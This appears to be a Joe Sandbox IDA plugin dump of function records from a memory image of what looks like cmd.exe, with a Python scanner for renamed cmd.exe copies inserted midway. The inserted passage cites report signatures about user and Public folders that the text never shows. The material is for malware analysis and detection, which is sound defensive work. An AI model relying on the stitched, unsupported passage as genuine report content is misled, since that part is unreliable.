                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmp$wcschr$wcstol
                                        • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                        • API String ID: 1738779099-3004636944
                                        • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                        • Instruction ID: 91402212a3ae88cf31f84014292e88cd3cc3ae96e2155215725611ac6ccbc0f7
                                        • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                        • Instruction Fuzzy Hash: 11728232F0C74286EB10AFA598456BDB7A1BB54BA8F804035CF2D97794FE7CA655C320
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F44
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A7F5C
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F9E
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7FFF
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8020
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8036
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8061
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8075
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A80D6
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A80EA
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8177
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A819A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81BD
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81DC
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81FB
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A821A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8239
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8291
                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82D7
                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82FB
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A831A
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8364
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8378
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A839A
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83AE
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83E6
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8403
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8418
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                        • API String ID: 3637805771-3100821235
                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction ID: cfbe3cc7852aa30d2df3946e539973b2af21d86a31baaf239b726bb3d2dacccd
                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction Fuzzy Hash: 1DE18631B0CA529AE710AF66E404179FBA1FB59BA5B849134CF2E53790FF3DA605C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                        • String ID: %s$%s
                                        • API String ID: 3623545644-3518022669
                                        • Opcode ID: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                        • Instruction ID: d0b563bb9cc306e0e4df485a7d25c962b1382668511b756263e32e99a4ac6482
                                        • Opcode Fuzzy Hash: eb6ac1f09caa6f1e312a2d23d751c7def4113e850203b77677b5d6367ed255d4
                                        • Instruction Fuzzy Hash: A5D2B631B0C6428AEB64AF6598406BDF7A1FB857A4F840139DF6E47A94EF3CE604C710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                        • String ID: %9d$%s
                                        • API String ID: 4286035211-3662383364
                                        • Opcode ID: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                        • Instruction ID: 5bf4b2b86bce17d52584448d4c903f78c3f3c64a10c571d69ac78ca714443a69
                                        • Opcode Fuzzy Hash: 61b27ca8b3239945596bad14bd7a0189cef10c291a2db1f54d547116b75f0017
                                        • Instruction Fuzzy Hash: B352A532B0CA818AEB64AF65D8542F9B7A1FB457A9F804131DF2E47798EF3CD6448710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcsrchr$towlower
                                        • String ID: fdpnxsatz
                                        • API String ID: 3267374428-1106894203
                                        • Opcode ID: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                        • Instruction ID: 28d6c80193d3cc28af7abec75f3b1f14f3632b9bdd7be6a35c6cdd868e58a36c
                                        • Opcode Fuzzy Hash: 4d289080c925d94ee40dfd5c740acf21fb6c185afaabc48c5a913d1d7a14547b
                                        • Instruction Fuzzy Hash: 5E42C521B0CA82C5EB64AF6695046B9A7A6FF45BA4F844136DF2E077C4FF3CE6418710
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                        • String ID: DPATH
                                        • API String ID: 95024817-2010427443
                                        • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction ID: 62e4c871c5ab285b35346810f93ffdcaa57cc52ed22cd8cd89e60beb153362e9
                                        • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction Fuzzy Hash: 2B128432B0C68286E764AF15A44417DF6A1FB897A4F845139EF6E57794EF3CEA00CB10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: [...]$ [..]$ [.]$...$:
                                        • API String ID: 0-1980097535
                                        • Opcode ID: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                        • Instruction ID: fb5f13cd704cbfc11ff92ddfb004e6f7f675543f1566ed1e103ea8ba7d5b5265
                                        • Opcode Fuzzy Hash: b4f7b18fcade78829ab7640c0e3796605864497f0bac3bc258d57cc8563df65d
                                        • Instruction Fuzzy Hash: B1328F72B0CA8286EB60EF61A8442F9B3A5EB457A8F804135DF2D47695FF3CD645C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 1795611712-3662956551
                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction ID: c4ffb43a4dd708b072ce748a150b20da4085b9160fc97b799ab9da3276c8643d
                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction Fuzzy Hash: 60E1B022B0C64296E710BF65A8405BDE6A1BB897A4FD44136DF2E57695FF3CE604C320
                                        APIs
                                        • _wcsupr.MSVCRT ref: 00007FF7CD4AEF33
                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEF98
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFA9
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFBF
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD4AEFDC
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFED
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF003
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF022
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF083
                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF092
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF0A5
                                        • towupper.MSVCRT(?,?,?,?,0000000A,?), ref: 00007FF7CD4AF0DB
                                        • wcschr.MSVCRT(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF135
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF16C
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF185
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                        • String ID: <noalias>$CMD.EXE
                                        • API String ID: 1161012917-1690691951
                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction ID: 4e3c0843de50850b4fe100313f1512b8d9d8aa4f9707322f8eeeaf3b5cd027c3
                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction Fuzzy Hash: 43919321B0DA529AFB04BF61D8040BDBAA1AF59B74F844135EF2E526D5FF3CA6458330
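The String IDs in the function records above (the internal command names chdir, mkdir, pushd and rmdir; the default PATHEXT list .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC; the for-variable modifier letters fdpnxsatz; DPATH; <noalias> and CMD.EXE) are text that cmd.exe carries in its own image, which is what a copy of cmd.exe running under another file name would show. A content-based check for such copies, as an added example that is not part of the Joe Sandbox report: the marker weights, the threshold of 5 and the sample buffers are assumptions constructed for the demonstration, and the markers are matched as UTF-16LE (cmd.exe's native string encoding) with an ASCII fallback.

```python
"""Content-based check for a renamed copy of cmd.exe.

Added example; not part of the Joe Sandbox report. The marker strings are the
"String ID" values shown in the function records above; their weights, the
threshold and the sample buffers below are assumptions made for this demo.
"""
import sys
from pathlib import Path
from typing import Dict, Iterable, Iterator, Tuple

# Strings cmd.exe carries in its own image (all listed in the records above).
# Weight reflects how specific each string is to cmd.exe (assumed values).
CMD_MARKERS: Dict[str, int] = {
    ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC": 3,  # default PATHEXT
    "fdpnxsatz": 3,   # letters accepted after %~ in for-variable expansion
    "<noalias>": 2,
    "DPATH": 1,       # internal command; also an env-var name elsewhere
    "CMD.EXE": 1,
    "chdir": 1, "mkdir": 1, "pushd": 1, "rmdir": 1,  # internal command names
}
DEFAULT_THRESHOLD = 5  # assumption: PATHEXT or fdpnxsatz plus two weaker hits


def is_pe(data: bytes) -> bool:
    """Cheap PE check: 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return 0x40 <= e_lfanew < len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def find_cmd_markers(data: bytes) -> Dict[str, str]:
    """Return {marker: encoding} for each marker present as UTF-16LE or ASCII."""
    hits: Dict[str, str] = {}
    for marker in CMD_MARKERS:
        for enc in ("utf-16-le", "ascii"):
            if marker.encode(enc) in data:
                hits[marker] = enc
                break
    return hits


def cmd_score(hits: Dict[str, str]) -> int:
    """Sum the weights of the markers that were found."""
    return sum(CMD_MARKERS[m] for m in hits)


def looks_like_renamed_cmd(filename: str, data: bytes,
                           threshold: int = DEFAULT_THRESHOLD) -> Tuple[bool, int]:
    """(flagged, score): a PE not named cmd.exe whose contents score like cmd.exe."""
    if not is_pe(data) or Path(filename).name.lower() == "cmd.exe":
        return False, 0
    score = cmd_score(find_cmd_markers(data))
    return score >= threshold, score


def scan_directory(root: Path) -> Iterator[Tuple[Path, int]]:
    """Yield (path, score) for every file under root that looks like a renamed cmd.exe."""
    for p in root.rglob("*"):
        if p.is_file():
            flagged, score = looks_like_renamed_cmd(p.name, p.read_bytes())
            if flagged:
                yield p, score


# --- constructed samples (not files from the report) -------------------------
def build_sample_pe(markers: Iterable[str]) -> bytes:
    """Minimal MZ/PE-shaped buffer with the given strings embedded as UTF-16LE."""
    header = b"MZ" + b"\0" * 58 + (0x40).to_bytes(4, "little") + b"PE\0\0"
    filler = b"\x90" * 32
    return header + filler + filler.join(m.encode("utf-16-le") for m in markers)


RENAMED_CMD_SAMPLE = build_sample_pe(CMD_MARKERS)          # carries every marker
BENIGN_PE_SAMPLE = build_sample_pe(["DPATH", "chdir"])     # incidental overlap only
TEXT_SAMPLE = " ".join(CMD_MARKERS).encode("utf-16-le")    # the strings, but not a PE

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for path, score in scan_directory(root):
        print(f"{path}: score {score}, looks like a renamed cmd.exe")
```

Run it against the directories the report's signatures point at (the user root and the Public folder) rather than trusting file names; the name check only suppresses the legitimate system copy, so a file that really is cmd.exe but sits outside System32 under its own name still needs a path check on top of this.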
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4832F3
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014,?,?,0000002F,00007FF7CD4832A4), ref: 00007FF7CD483309
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD483384
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A11DF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
• Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
